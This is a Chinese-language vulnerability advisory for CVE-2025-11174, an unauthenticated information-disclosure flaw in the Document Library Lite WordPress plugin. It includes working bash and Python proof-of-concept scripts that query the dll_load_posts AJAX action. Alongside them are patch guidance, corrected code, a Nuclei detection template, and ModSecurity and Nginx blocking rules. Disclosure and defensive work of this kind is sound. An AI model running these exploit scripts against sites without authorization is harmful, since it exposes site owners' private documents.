
Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174
关键词: CVE-2025-11174, Document Library Lite漏洞, 信息泄露, WordPress安全, 未认证AJAX利用, WordPress插件漏洞, CWE-862, WordPress文档插件安全, 授权绕过, WordPress CVE 2025
Document Library Lite WordPress插件信息泄露漏洞 (CVE-2025-11174) – 允许未认证攻击者访问WordPress文档库插件中敏感文档数据的安全缺陷。
在Document Library Lite WordPress插件中发现了一个严重的授权绕过漏洞,允许未认证攻击者在未通过认证的情况下访问敏感文档信息。
发现者: Kai Aizen & Avraham Shemesh (SnailSploit)
发布: 2025年11月1日
CVSS评分: 5.3 (中等)
CWE: CWE-862 - 缺少授权
插件: Document Library Lite
供应商: Barn2 Plugins
攻击类型: 未认证信息泄露
所需权限: 无 (未认证攻击)
Document Library Lite WordPress插件在所有版本(包括1.1.6及之前版本)中存在授权不当的漏洞。该插件暴露了一个未认证的AJAX动作dll_load_posts,该动作在没有执行nonce或权限检查的情况下返回文档数据的JSON表格。
该漏洞允许未认证攻击者:
注意: CVSS评分5.3(中等严重性)反映了有限的信息泄露。虽然该漏洞允许未认证访问文档数据,但保密性影响被评为低级,对完整性和可用性无影响。
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS v3.1 分解:
AJAX动作dll_load_posts在注册时未进行适当的认证或授权检查:
// 漏洞代码模式(简化)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
wp_ajax_nopriv_前缀表示该动作对未认证用户可访问,并且回调函数未实现:
POST /wp-admin/admin-ajax.php
action=dll_load_posts
该漏洞可通过WordPress的admin-ajax.php端点利用,无需认证。
⚠️ 仅用于教育和授权测试目的
#!/bin/bash
# CVE-2025-11174 PoC
TARGET_URL="$1"
if [ -z "$TARGET_URL" ]; then
echo "Usage: $0 <target_url>"
echo "Example: $0 https://example.com"
exit 1
fi
echo "[*] CVE-2025-11174 - Document Library Lite 信息泄露 PoC"
echo "[*] 目标: $TARGET_URL"
echo ""
# 向易受攻击的AJAX端点发送请求
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=dll_load_posts" \
| python3 -m json.tool
echo ""
echo "[+] 如果您看到上方出现了文档数据,则该站点存在漏洞!"
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite 信息泄露 PoC
仅用于教育和授权测试目的
"""
import requests
import sys
import json
def exploit(target_url):
ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
print(f"[*] 目标: {target_url}")
print(f"[*] AJAX端点: {ajax_url}\n")
data = {'action': 'dll_load_posts'}
try:
response = requests.post(ajax_url, data=data, timeout=10)
if response.status_code == 200:
print("[+] 请求成功!\n")
try:
json_data = response.json()
print("[+] 获取到的文档数据:")
print(json.dumps(json_data, indent=2))
print("\n[!] 站点存在 CVE-2025-11174 漏洞!")
except json.JSONDecodeError:
print("[-] 未收到JSON响应")
print(f"响应: {response.text[:200]}")
else:
print(f"[-] 请求失败,状态码: {response.status_code}")
except requests.RequestException as e:
print(f"[-] 错误: {e}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"用法: {sys.argv[0]} <目标URL>")
print(f"示例: {sys.argv[0]} https://example.com")
sys.exit(1)
target = sys.argv[1]
exploit(target)
需要立即采取的措施:
action=dll_load_posts的可疑POST请求到admin-ajax.php通过WordPress管理后台:
使用WP-CLI:
wp plugin update document-library-lite
确保所有AJAX处理器实现适当的安全控制:
// 正确AJAX安全的示例
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');
function dll_load_posts_callback() {
// 验证nonce
if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
wp_die('无效的nonce');
}
// 检查权限
if (!current_user_can('read')) {
wp_send_json_error('权限不足');
wp_die();
}
// 您的安全代码在此
}
# 检查是否安装了易受攻击的版本
wp plugin list | grep -i "document-library-lite"
Nuclei模板:
id: CVE-2025-11174
info:
name: Document Library Lite - 未认证信息泄露
author: security-research
severity: medium
description: Document Library Lite WordPress插件易受信息泄露攻击
reference:
- https://github.com/[your-repo]/CVE-2025-11174
tags: cve,cve2025,wordpress,wp-plugin,unauth
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"
body: "action=dll_load_posts"
matchers-condition: and
matchers:
- type: word
words:
- "data"
- "recordsTotal"
condition: and
- type: status
status:
- 200
ModSecurity规则:
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
"chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
log,deny,status:403,msg:'CVE-2025-11174 利用尝试'"
SecRule ARGS:action "@streq dll_load_posts" "t:none"
Nginx/OpenResty规则:
if ($request_uri ~* "admin-ajax\.php") {
if ($args ~* "action=dll_load_posts") {
return 403;
}
}
研究人员:
披露流程: 协调披露
此信息仅供安全研究和防御目的使用。任何恶意利用此漏洞的行为都是非法且不道德的。在测试您不拥有的系统之前,请始终获得适当的授权。
如有关于此漏洞的问题或更多信息:
最后更新:2025年11月2日
此项目的完整报告、方法论及相关研究位于:
https://snailsploit.com/security-research/cves/cve-2025-11174/
由 Kai Aizen 创建 — 独立进攻性安全研究员。
snailsploit.com · 研究 · 框架 · GitHub · LinkedIn · ResearchGate · X/Twitter
同样的攻击。不同的基底。
| 指标 | 值 |
|---|
| 攻击向量 | 网络 (AV:N) |
| 攻击复杂度 | 低 (AC:L) |
| 所需权限 | 无 (PR:N) |
| 用户交互 | 无 (UI:N) |
| 范围 | 未改变 (S:U) |
| 保密性 | 低 (C:L) |
| 完整性 | 无 (I:N) |
| 可用性 | 无 (A:N) |